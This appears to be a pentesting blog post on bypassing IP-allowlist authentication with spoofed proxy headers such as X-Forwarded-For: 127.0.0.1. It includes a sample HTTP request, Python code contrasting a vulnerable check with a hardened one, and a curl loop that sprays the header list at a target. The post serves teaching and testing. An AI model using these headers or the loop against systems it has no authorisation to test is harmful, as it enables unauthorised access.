Auth Bypass Headers

Adapted from this tweet:

The following headers can potentially be used to bypass authentication on a webserver.

  • X-Forwarded: 127.0.0.1
  • X-Forwarded-By: 127.0.0.1
  • X-Forwarded-For: 127.0.0.1
  • X-Forwarded-For-Original: 127.0.0.1
  • X-Forwarder-For: 127.0.0.1
  • X-Forward-For: 127.0.0.1
  • Forwarded-For: 127.0.0.1
  • Forwarded-For-Ip: 127.0.0.1
  • X-Custom-IP-Authorization: 127.0.0.1
  • X-Originating-Ip: 127.0.0.1
  • X-Remote-IP: 127.0.0.1
  • X-Remote-Addr: 127.0.0.1
  • X-Trusted-IP: 127.0.0.1
  • X-Requested-By: 127.0.0.1
  • X-Requested-For: 127.0.0.1

Example Usage

Scenario: You try to access /login and get a custom 401 response that says something like:

IP not on Whitelist!

(not a likely response but serves as an example)

You'd then try to send the following request:

GET /login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: pentest.bl3ak.com
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
X-Forwarded-For: 127.0.0.1

That endpoint doesn't exist on this site; this is not a lab. {: .prompt-warning}

The idea is that the webserver will parse the X-Forwarded-For header, assume that the request was forwarded to it on behalf of 127.0.0.1 / localhost, and let you access the "blocked" /login endpoint.
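To make the server-side bug concrete, here is an added example (not from the original post) of an IP-allowlist check that trusts X-Forwarded-For from anyone, beside a hardened version that only honours the header when the TCP peer is a known reverse proxy. The allowlist, trusted-proxy address and request dict are constructed sample values.

```python
import ipaddress

# Allowlist of client addresses permitted to reach /login (constructed sample).
LOGIN_ALLOWLIST = {ipaddress.ip_address("127.0.0.1")}

# Reverse proxies whose X-Forwarded-For values may be trusted (constructed sample).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

# Constructed stand-in for a parsed request: the header the post describes,
# supplied by a client connecting directly, not by any proxy.
SPOOFED_REQUEST = {"Host": "pentest.bl3ak.com", "X-Forwarded-For": "127.0.0.1"}


def vulnerable_client_ip(headers, peer_ip):
    """Vulnerable: believes X-Forwarded-For no matter who sent the request."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        # The left-most hop is client-controlled; this is the bug the post relies on.
        return ipaddress.ip_address(xff.split(",")[0].strip())
    return ipaddress.ip_address(peer_ip)


def hardened_client_ip(headers, peer_ip, trusted_proxies=TRUSTED_PROXIES):
    """Hardened: only honour X-Forwarded-For when the TCP peer is a known proxy,
    and then use the right-most hop (the one our proxy appended), not the left-most."""
    peer = ipaddress.ip_address(peer_ip)
    if peer not in trusted_proxies:
        # Direct connection or unknown proxy: the header is untrusted input.
        return peer
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    try:
        return ipaddress.ip_address(hops[-1]) if hops else peer
    except ValueError:
        return peer  # Malformed header: fall back to the proxy's own address.


def login_allowed(client_ip_fn, headers, peer_ip):
    """True when the resolved client address is on the /login allowlist."""
    return client_ip_fn(headers, peer_ip) in LOGIN_ALLOWLIST


if __name__ == "__main__":
    attacker = "203.0.113.7"  # TEST-NET address standing in for a direct client
    print("vulnerable:", login_allowed(vulnerable_client_ip, SPOOFED_REQUEST, attacker))  # True
    print("hardened:  ", login_allowed(hardened_client_ip, SPOOFED_REQUEST, attacker))    # False
```

The same principle applies to every header in the list above: a proxy-supplied header is only as trustworthy as the peer that delivered it, so the check must be keyed on the peer address, not on the header's presence.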

Automation Block

X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Trusted-IP: 127.0.0.1
X-Requested-By: 127.0.0.1
X-Requested-For: 127.0.0.1

Copy the above into a text file named headers.txt, then run:

TARGET=<target-ip-address>
# Read whole lines: $(cat ...) would split each header at its space and send two broken headers
while IFS= read -r header; do [ -n "$header" ] && curl -v "$TARGET" -H "$header"; done < headers.txt

That's your lot.

Enjoy,